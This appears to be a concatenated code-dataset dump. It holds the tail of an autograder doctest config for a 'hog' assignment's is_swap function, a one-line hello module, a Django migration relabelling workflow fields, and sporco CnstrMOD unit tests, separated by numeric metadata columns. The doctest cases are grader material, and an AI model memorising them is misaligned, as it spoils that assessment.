False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(753, 857)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(160, 909)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(796, 99)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(333, 699)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(288, 975)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(417, 794)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(481, 14)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(686, 874)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(42, 835)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(0, 460)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(186, 253)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(297, 531)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(986, 422)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(419, 105)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(554, 180)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(334, 34)
True
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': r"""
>>> from hog import *
""",
'teardown': '',
'type': 'doctest'
}
]
}
| 19.743811
| 31
| 0.277124
| 1,272
| 18,342
| 3.906447
| 0.165094
| 0.114711
| 0.160596
| 0.252365
| 0.871604
| 0.863755
| 0.863755
| 0.863755
| 0.863755
| 0.192192
| 0
| 0.076781
| 0.558336
| 18,342
| 928
| 32
| 19.765086
| 0.5366
| 0
| 0
| 0.617457
| 0
| 0
| 0.46429
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.001078
| 0
| 0.001078
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81a8a79745440cdace8ecafcb0a2ffd03f57f378
| 39
|
py
|
Python
|
test_path/libs/hello.py
|
mozz100/pytest-pythonpath
|
af0f3024485a75d442e56188d517307dafae3bae
|
[
"MIT"
] | 70
|
2015-01-12T13:23:28.000Z
|
2021-05-28T07:14:15.000Z
|
test_path/libs/hello.py
|
mozz100/pytest-pythonpath
|
af0f3024485a75d442e56188d517307dafae3bae
|
[
"MIT"
] | 9
|
2015-01-13T18:17:41.000Z
|
2021-04-05T19:34:37.000Z
|
test_path/libs/hello.py
|
mozz100/pytest-pythonpath
|
af0f3024485a75d442e56188d517307dafae3bae
|
[
"MIT"
] | 13
|
2015-01-13T09:45:31.000Z
|
2021-05-20T23:03:29.000Z
|
def return_hello():
return "hello"
| 13
| 19
| 0.666667
| 5
| 39
| 5
| 0.6
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.205128
| 39
| 2
| 20
| 19.5
| 0.806452
| 0
| 0
| 0
| 0
| 0
| 0.128205
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
81b850f660cddeeaf759d44cb9ea36542b843d0d
| 31,281
|
py
|
Python
|
workflow/migrations/0017_auto_20180419_0905.py
|
mercycorps/TolaWorkflow
|
59542132fafd611081adb0e8cfaa04abc5886d7a
|
[
"Apache-2.0"
] | null | null | null |
workflow/migrations/0017_auto_20180419_0905.py
|
mercycorps/TolaWorkflow
|
59542132fafd611081adb0e8cfaa04abc5886d7a
|
[
"Apache-2.0"
] | 268
|
2020-03-31T15:46:59.000Z
|
2022-03-31T18:01:08.000Z
|
workflow/migrations/0017_auto_20180419_0905.py
|
Falliatcom-sa/falliatcom
|
39fb926de072c296ed32d50cccfb8003ca870739
|
[
"Apache-2.0"
] | 1
|
2021-01-05T01:58:24.000Z
|
2021-01-05T01:58:24.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2018-04-19 16:05
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('workflow', '0016_auto_20170623_1306'),
]
operations = [
migrations.AlterModelOptions(
name='checklistitem',
options={'ordering': ('item',), 'verbose_name': 'Checklist Item'},
),
migrations.AlterModelOptions(
name='formguidance',
options={'ordering': ('create_date',), 'verbose_name': 'Form Guidance'},
),
migrations.AlterModelOptions(
name='fundcode',
options={'ordering': ('name',), 'verbose_name': 'Fund Code'},
),
migrations.AlterModelOptions(
name='landtype',
options={'ordering': ('classify_land',), 'verbose_name': 'Land Type'},
),
migrations.AlterModelOptions(
name='office',
options={'ordering': ('name',), 'verbose_name': 'Office'},
),
migrations.AlterModelOptions(
name='profiletype',
options={'ordering': ('profile',), 'verbose_name': 'Profile Type'},
),
migrations.AlterModelOptions(
name='program',
options={'ordering': ('name',), 'verbose_name': 'Program'},
),
migrations.AlterModelOptions(
name='projecttype',
options={'ordering': ('name',), 'verbose_name': 'Project Type'},
),
migrations.AlterModelOptions(
name='sector',
options={'ordering': ('sector',), 'verbose_name': 'Sector'},
),
migrations.AlterModelOptions(
name='template',
options={'ordering': ('name',), 'verbose_name': 'Template'},
),
migrations.AlterModelOptions(
name='tolabookmarks',
options={'ordering': ('name',), 'verbose_name': 'Tola Bookmarks'},
),
migrations.AlterModelOptions(
name='tolauser',
options={'ordering': ('name',), 'verbose_name': 'Tola User'},
),
migrations.AlterField(
model_name='approvalauthority',
name='approval_user',
field=models.ForeignKey(blank=True, help_text='User with Approval Authority', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='auth_approving', to='workflow.TolaUser', verbose_name='Tola User'),
),
migrations.AlterField(
model_name='approvalauthority',
name='country',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Country', verbose_name='Country'),
),
migrations.AlterField(
model_name='benchmarks',
name='actual_end_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Actual end date'),
),
migrations.AlterField(
model_name='benchmarks',
name='actual_start_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Actual start date'),
),
migrations.AlterField(
model_name='benchmarks',
name='complete',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.ProjectComplete', verbose_name='Complete'),
),
migrations.AlterField(
model_name='benchmarks',
name='est_end_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Est end date'),
),
migrations.AlterField(
model_name='benchmarks',
name='est_start_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Est start date'),
),
migrations.AlterField(
model_name='benchmarks',
name='site',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.SiteProfile', verbose_name='site'),
),
migrations.AlterField(
model_name='budget',
name='complete',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='workflow.ProjectComplete', verbose_name='Complete'),
),
migrations.AlterField(
model_name='budget',
name='contributor',
field=models.CharField(blank=True, max_length=135, null=True, verbose_name='Contributor'),
),
migrations.AlterField(
model_name='budget',
name='description_of_contribution',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Description of contribution'),
),
migrations.AlterField(
model_name='checklist',
name='country',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Country', verbose_name='Country'),
),
migrations.AlterField(
model_name='checklist',
name='name',
field=models.CharField(blank=True, default='Checklist', max_length=255, null=True, verbose_name='Name'),
),
migrations.AlterField(
model_name='checklistitem',
name='checklist',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='workflow.Checklist', verbose_name='Checklist'),
),
migrations.AlterField(
model_name='checklistitem',
name='item',
field=models.CharField(max_length=255, verbose_name='Item'),
),
migrations.AlterField(
model_name='checklistitem',
name='owner',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.TolaUser', verbose_name='Owner'),
),
migrations.AlterField(
model_name='contact',
name='country',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='workflow.Country', verbose_name='Country'),
),
migrations.AlterField(
model_name='country',
name='create_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Create date'),
),
migrations.AlterField(
model_name='country',
name='edit_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Edit date'),
),
migrations.AlterField(
model_name='country',
name='organization',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Organization', verbose_name='organization'),
),
migrations.AlterField(
model_name='documentation',
name='description',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Description'),
),
migrations.AlterField(
model_name='documentation',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='workflow.Program', verbose_name='Program'),
),
migrations.AlterField(
model_name='documentation',
name='project',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.ProjectAgreement', verbose_name='Project'),
),
migrations.AlterField(
model_name='documentation',
name='template',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Template', verbose_name='Template'),
),
migrations.AlterField(
model_name='formguidance',
name='form',
field=models.CharField(blank=True, max_length=135, null=True, verbose_name='Form'),
),
migrations.AlterField(
model_name='formguidance',
name='guidance',
field=models.TextField(blank=True, null=True, verbose_name='Guidance'),
),
migrations.AlterField(
model_name='historicalbudget',
name='contributor',
field=models.CharField(blank=True, max_length=135, null=True, verbose_name='Contributor'),
),
migrations.AlterField(
model_name='historicalbudget',
name='description_of_contribution',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Description of contribution'),
),
migrations.AlterField(
model_name='historicalprojectagreement',
name='description_of_community_involvement',
field=models.TextField(blank=True, null=True, verbose_name='Description of community involvement'),
),
migrations.AlterField(
model_name='historicalprojectagreement',
name='description_of_government_involvement',
field=models.TextField(blank=True, null=True, verbose_name='Description of government involvement'),
),
migrations.AlterField(
model_name='historicalprojectagreement',
name='description_of_project_activities',
field=models.TextField(blank=True, null=True, verbose_name='Description of project activities'),
),
migrations.AlterField(
model_name='historicalprojectagreement',
name='estimation_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Estimation date'),
),
migrations.AlterField(
model_name='historicalprojectcomplete',
name='actual_cost_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Actual cost date'),
),
migrations.AlterField(
model_name='historicalprojectcomplete',
name='actual_duration',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Actual duaration'),
),
migrations.AlterField(
model_name='historicalprojectcomplete',
name='actual_end_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Actual end date'),
),
migrations.AlterField(
model_name='historicalprojectcomplete',
name='actual_start_date',
field=models.DateTimeField(blank=True, help_text='Imported from Project Initiation', null=True, verbose_name='Actual start date'),
),
migrations.AlterField(
model_name='historicalprojectcomplete',
name='expected_end_date',
field=models.DateTimeField(blank=True, help_text='Imported Project Initiation', null=True, verbose_name='Expected end date'),
),
migrations.AlterField(
model_name='historicalprojectcomplete',
name='expected_start_date',
field=models.DateTimeField(blank=True, help_text='Imported from Project Initiation', null=True, verbose_name='Expected start date'),
),
migrations.AlterField(
model_name='historicalsiteprofile',
name='male_6_9',
field=models.IntegerField(blank=True, null=True, verbose_name='Male age 6-9'),
),
migrations.AlterField(
model_name='historicalsiteprofile',
name='total_female',
field=models.IntegerField(blank=True, null=True, verbose_name='Total female'),
),
migrations.AlterField(
model_name='historicalsiteprofile',
name='total_male',
field=models.IntegerField(blank=True, null=True, verbose_name='Total male'),
),
migrations.AlterField(
model_name='historicalsiteprofile',
name='total_population',
field=models.IntegerField(blank=True, null=True, verbose_name='Total population'),
),
migrations.AlterField(
model_name='loggeduser',
name='country',
field=models.CharField(max_length=100, verbose_name='Country'),
),
migrations.AlterField(
model_name='loggeduser',
name='email',
field=models.CharField(default='user@mercycorps.com', max_length=100, verbose_name='Email'),
),
migrations.AlterField(
model_name='loggeduser',
name='username',
field=models.CharField(max_length=30, primary_key=True, serialize=False, verbose_name='Username'),
),
migrations.AlterField(
model_name='monitor',
name='complete',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.ProjectComplete', verbose_name='complete'),
),
migrations.AlterField(
model_name='organization',
name='create_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Create date'),
),
migrations.AlterField(
model_name='organization',
name='edit_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Edit date'),
),
migrations.AlterField(
model_name='organization',
name='organization_url',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Organization url'),
),
migrations.AlterField(
model_name='program',
name='country',
field=models.ManyToManyField(to='workflow.Country', verbose_name='Country'),
),
migrations.AlterField(
model_name='program',
name='fund_code',
field=models.ManyToManyField(blank=True, to='workflow.FundCode', verbose_name='Fund code'),
),
migrations.AlterField(
model_name='program',
name='sector',
field=models.ManyToManyField(blank=True, to='workflow.Sector', verbose_name='Sector'),
),
migrations.AlterField(
model_name='projectagreement',
name='approval_submitted_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='submitted_by_agreement', to='workflow.TolaUser', verbose_name='Approval submitted by'),
),
migrations.AlterField(
model_name='projectagreement',
name='checked_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='checking', to='workflow.TolaUser', verbose_name='Checked by'),
),
migrations.AlterField(
model_name='projectagreement',
name='description_of_community_involvement',
field=models.TextField(blank=True, null=True, verbose_name='Description of community involvement'),
),
migrations.AlterField(
model_name='projectagreement',
name='description_of_government_involvement',
field=models.TextField(blank=True, null=True, verbose_name='Description of government involvement'),
),
migrations.AlterField(
model_name='projectagreement',
name='description_of_project_activities',
field=models.TextField(blank=True, null=True, verbose_name='Description of project activities'),
),
migrations.AlterField(
model_name='projectagreement',
name='estimation_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Estimation date'),
),
migrations.AlterField(
model_name='projectagreement',
name='evaluate',
field=models.ManyToManyField(blank=True, to='workflow.Evaluate', verbose_name='Evaluate'),
),
migrations.AlterField(
model_name='projectagreement',
name='finance_reviewed_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='finance_reviewing', to='workflow.TolaUser', verbose_name='Finance reviewed by'),
),
migrations.AlterField(
model_name='projectcomplete',
name='actual_cost_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Actual cost date'),
),
migrations.AlterField(
model_name='projectcomplete',
name='actual_duration',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Actual duaration'),
),
migrations.AlterField(
model_name='projectcomplete',
name='actual_end_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Actual end date'),
),
migrations.AlterField(
model_name='projectcomplete',
name='actual_start_date',
field=models.DateTimeField(blank=True, help_text='Imported from Project Initiation', null=True, verbose_name='Actual start date'),
),
migrations.AlterField(
model_name='projectcomplete',
name='approval_submitted_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='submitted_by_complete', to='workflow.TolaUser', verbose_name='Approval submitted by'),
),
migrations.AlterField(
model_name='projectcomplete',
name='approved_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='approving_agreement_complete', to='workflow.TolaUser', verbose_name='Approved by'),
),
migrations.AlterField(
model_name='projectcomplete',
name='checked_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='checking_complete', to='workflow.TolaUser', verbose_name='Checked by'),
),
migrations.AlterField(
model_name='projectcomplete',
name='estimated_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='estimating_complete', to='workflow.TolaUser', verbose_name='Estimated by'),
),
migrations.AlterField(
model_name='projectcomplete',
name='expected_end_date',
field=models.DateTimeField(blank=True, help_text='Imported Project Initiation', null=True, verbose_name='Expected end date'),
),
migrations.AlterField(
model_name='projectcomplete',
name='expected_start_date',
field=models.DateTimeField(blank=True, help_text='Imported from Project Initiation', null=True, verbose_name='Expected start date'),
),
migrations.AlterField(
model_name='projectcomplete',
name='office',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Office', verbose_name='Office'),
),
migrations.AlterField(
model_name='projectcomplete',
name='program',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='complete', to='workflow.Program', verbose_name='Program'),
),
migrations.AlterField(
model_name='projectcomplete',
name='project_type',
field=models.ForeignKey(blank=True, max_length=255, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.ProjectType', verbose_name='Project Type'),
),
migrations.AlterField(
model_name='projectcomplete',
name='reviewed_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='reviewing_complete', to='workflow.TolaUser', verbose_name='Reviewed by'),
),
migrations.AlterField(
model_name='projectcomplete',
name='sector',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Sector', verbose_name='Sector'),
),
migrations.AlterField(
model_name='projectcomplete',
name='site',
field=models.ManyToManyField(blank=True, to='workflow.SiteProfile', verbose_name='Site'),
),
migrations.AlterField(
model_name='projectcomplete',
name='stakeholder',
field=models.ManyToManyField(blank=True, to='workflow.Stakeholder', verbose_name='Stakeholder'),
),
migrations.AlterField(
model_name='projecttype',
name='description',
field=models.CharField(max_length=765, verbose_name='Description'),
),
migrations.AlterField(
model_name='province',
name='country',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='workflow.Country', verbose_name='Country'),
),
migrations.AlterField(
model_name='siteprofile',
name='approved_by',
field=models.ForeignKey(blank=True, help_text='This is the Provincial Line Manager', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='comm_approving', to='workflow.TolaUser', verbose_name='Approved by'),
),
migrations.AlterField(
model_name='siteprofile',
name='classify_land',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.LandType', verbose_name='Classify land'),
),
migrations.AlterField(
model_name='siteprofile',
name='country',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='workflow.Country', verbose_name='Country'),
),
migrations.AlterField(
model_name='siteprofile',
name='filled_by',
field=models.ForeignKey(blank=True, help_text='This is the originator', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='comm_estimate', to='workflow.TolaUser', verbose_name='Filled by'),
),
migrations.AlterField(
model_name='siteprofile',
name='location_verified_by',
field=models.ForeignKey(blank=True, help_text='This should be GIS Manager', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='comm_gis', to='workflow.TolaUser', verbose_name='Location verified by'),
),
migrations.AlterField(
model_name='siteprofile',
name='male_6_9',
field=models.IntegerField(blank=True, null=True, verbose_name='Male age 6-9'),
),
migrations.AlterField(
model_name='siteprofile',
name='office',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Office', verbose_name='Office'),
),
migrations.AlterField(
model_name='siteprofile',
name='total_female',
field=models.IntegerField(blank=True, null=True, verbose_name='Total female'),
),
migrations.AlterField(
model_name='siteprofile',
name='total_male',
field=models.IntegerField(blank=True, null=True, verbose_name='Total male'),
),
migrations.AlterField(
model_name='siteprofile',
name='total_population',
field=models.IntegerField(blank=True, null=True, verbose_name='Total population'),
),
migrations.AlterField(
model_name='siteprofile',
name='type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.ProfileType', verbose_name='Type'),
),
migrations.AlterField(
model_name='stakeholder',
name='approved_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stake_approving', to='workflow.TolaUser', verbose_name='Approved by'),
),
migrations.AlterField(
model_name='stakeholder',
name='contact',
field=models.ManyToManyField(blank=True, max_length=255, to='workflow.Contact', verbose_name='Contact'),
),
migrations.AlterField(
model_name='stakeholder',
name='country',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='workflow.Country', verbose_name='Country'),
),
migrations.AlterField(
model_name='stakeholder',
name='filled_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stake_filled', to='workflow.TolaUser', verbose_name='Filled by'),
),
migrations.AlterField(
model_name='stakeholder',
name='notes',
field=models.TextField(blank=True, max_length=765, null=True, verbose_name='Notes'),
),
migrations.AlterField(
model_name='stakeholder',
name='sectors',
field=models.ManyToManyField(blank=True, to='workflow.Sector', verbose_name='Sectors'),
),
migrations.AlterField(
model_name='stakeholder',
name='type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.StakeholderType', verbose_name='Type'),
),
migrations.AlterField(
model_name='template',
name='description',
field=models.CharField(max_length=765, verbose_name='Description'),
),
migrations.AlterField(
model_name='tolabookmarks',
name='bookmark_url',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Bookmark url'),
),
migrations.AlterField(
model_name='tolabookmarks',
name='create_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Create date'),
),
migrations.AlterField(
model_name='tolabookmarks',
name='edit_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Edit date'),
),
migrations.AlterField(
model_name='tolabookmarks',
name='name',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Name'),
),
migrations.AlterField(
model_name='tolabookmarks',
name='program',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Program', verbose_name='Program'),
),
migrations.AlterField(
model_name='tolabookmarks',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='tolabookmark', to='workflow.TolaUser', verbose_name='User'),
),
migrations.AlterField(
model_name='tolasites',
name='agency_name',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Agency name'),
),
migrations.AlterField(
model_name='tolasites',
name='agency_url',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Agency url'),
),
migrations.AlterField(
model_name='tolasites',
name='created',
field=models.DateTimeField(blank=True, null=True, verbose_name='Created'),
),
migrations.AlterField(
model_name='tolasites',
name='name',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Name'),
),
migrations.AlterField(
model_name='tolasites',
name='privacy_disclaimer',
field=models.TextField(blank=True, null=True, verbose_name='Privacy disclaimer'),
),
migrations.AlterField(
model_name='tolasites',
name='site',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site', verbose_name='Site'),
),
migrations.AlterField(
model_name='tolasites',
name='tola_report_url',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Tola report url'),
),
migrations.AlterField(
model_name='tolasites',
name='tola_tables_token',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Tola tables token'),
),
migrations.AlterField(
model_name='tolasites',
name='tola_tables_url',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Tola tables url'),
),
migrations.AlterField(
model_name='tolasites',
name='tola_tables_user',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Tola tables user'),
),
migrations.AlterField(
model_name='tolasites',
name='updated',
field=models.DateTimeField(blank=True, null=True, verbose_name='Updated'),
),
migrations.AlterField(
model_name='tolauser',
name='country',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Country', verbose_name='Country'),
),
migrations.AlterField(
model_name='tolauser',
name='organization',
field=models.ForeignKey(blank=True, default=1, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Organization', verbose_name='Organization'),
),
migrations.AlterField(
model_name='tolauser',
name='title',
field=models.CharField(blank=True, choices=[('mr', 'Mr.'), ('mrs', 'Mrs.'), ('ms', 'Ms.')], max_length=3, null=True, verbose_name='Title'),
),
migrations.AlterField(
model_name='tolauser',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='tola_user', to=settings.AUTH_USER_MODEL, verbose_name='User'),
),
migrations.AlterField(
model_name='village',
name='district',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.District', verbose_name='District'),
),
]
| 46.968468
| 236
| 0.620153
| 3,062
| 31,281
| 6.176029
| 0.067929
| 0.076781
| 0.158638
| 0.18402
| 0.881127
| 0.848977
| 0.7686
| 0.701814
| 0.672624
| 0.645815
| 0
| 0.005408
| 0.255171
| 31,281
| 665
| 237
| 47.039098
| 0.806258
| 0.002174
| 0
| 0.787234
| 1
| 0
| 0.208427
| 0.028933
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.015198
| 0
| 0.019757
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
81daf20c49b5f3353991363c4a6421a1abf04c21
| 2,819
|
py
|
Python
|
alphacsc/other/sporco/sporco/admm/tests/test_cmod.py
|
sophiaas/alphacsc
|
402b8f6c8ee4ba9c86e9da0e2073d900cf8da207
|
[
"BSD-3-Clause"
] | 89
|
2017-05-31T19:20:52.000Z
|
2022-03-22T09:52:17.000Z
|
alphacsc/other/sporco/sporco/admm/tests/test_cmod.py
|
sophiaas/alphacsc
|
402b8f6c8ee4ba9c86e9da0e2073d900cf8da207
|
[
"BSD-3-Clause"
] | 75
|
2017-07-15T14:03:40.000Z
|
2022-03-29T17:31:58.000Z
|
alphacsc/other/sporco/sporco/admm/tests/test_cmod.py
|
sophiaas/alphacsc
|
402b8f6c8ee4ba9c86e9da0e2073d900cf8da207
|
[
"BSD-3-Clause"
] | 35
|
2017-06-16T12:48:23.000Z
|
2022-03-21T09:49:55.000Z
|
from __future__ import division
from builtins import object
import pytest
import numpy as np
from sporco.admm import cmod
import sporco.linalg as sl
class TestSet01(object):
def setup_method(self, method):
pass
def test_01(self):
N = 16
M = 4
K = 8
X = np.random.randn(M, K)
S = np.random.randn(N, K)
try:
b = cmod.CnstrMOD(X, S, (N, M))
b.solve()
except Exception as e:
print(e)
assert(0)
def test_02(self):
N = 16
M = 4
K = 8
X = np.random.randn(M, K)
S = np.random.randn(N, K)
try:
b = cmod.CnstrMOD(X, S)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_03(self):
N = 16
M = 4
K = 8
X = np.random.randn(M, K)
S = np.random.randn(N, K)
dt = np.float16
opt = cmod.CnstrMOD.Options({'Verbose': False, 'MaxMainIter': 20,
'AutoRho': {'Enabled': True},
'DataType': dt})
b = cmod.CnstrMOD(X, S, opt=opt)
b.solve()
assert(b.X.dtype == dt)
assert(b.Y.dtype == dt)
assert(b.U.dtype == dt)
def test_04(self):
N = 16
M = 4
K = 8
X = np.random.randn(M, K)
S = np.random.randn(N, K)
dt = np.float32
opt = cmod.CnstrMOD.Options({'Verbose': False, 'MaxMainIter': 20,
'AutoRho': {'Enabled': True},
'DataType': dt})
b = cmod.CnstrMOD(X, S, opt=opt)
b.solve()
assert(b.X.dtype == dt)
assert(b.Y.dtype == dt)
assert(b.U.dtype == dt)
def test_05(self):
N = 16
M = 4
K = 8
X = np.random.randn(M, K)
S = np.random.randn(N, K)
dt = np.float64
opt = cmod.CnstrMOD.Options({'Verbose': False, 'MaxMainIter': 20,
'AutoRho': {'Enabled': True},
'DataType': dt})
b = cmod.CnstrMOD(X, S, opt=opt)
b.solve()
assert(b.X.dtype == dt)
assert(b.Y.dtype == dt)
assert(b.U.dtype == dt)
def test_06(self):
opt = cmod.CnstrMOD.Options({'AuxVarObj': False})
assert(opt['fEvalX'] is True and opt['gEvalY'] is False)
opt['AuxVarObj'] = True
assert(opt['fEvalX'] is False and opt['gEvalY'] is True)
def test_07(self):
opt = cmod.CnstrMOD.Options({'AuxVarObj': True})
assert(opt['fEvalX'] is False and opt['gEvalY'] is True)
opt['AuxVarObj'] = False
assert(opt['fEvalX'] is True and opt['gEvalY'] is False)
| 25.862385
| 73
| 0.467187
| 363
| 2,819
| 3.595041
| 0.198347
| 0.061303
| 0.099617
| 0.064368
| 0.82682
| 0.82682
| 0.786973
| 0.786973
| 0.786973
| 0.786973
| 0
| 0.029499
| 0.398723
| 2,819
| 108
| 74
| 26.101852
| 0.740413
| 0
| 0
| 0.715909
| 0
| 0
| 0.072366
| 0
| 0
| 0
| 0
| 0
| 0.170455
| 1
| 0.090909
| false
| 0.011364
| 0.068182
| 0
| 0.170455
| 0.022727
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c4ad309062311f156efb1d213710c22ce21f3134
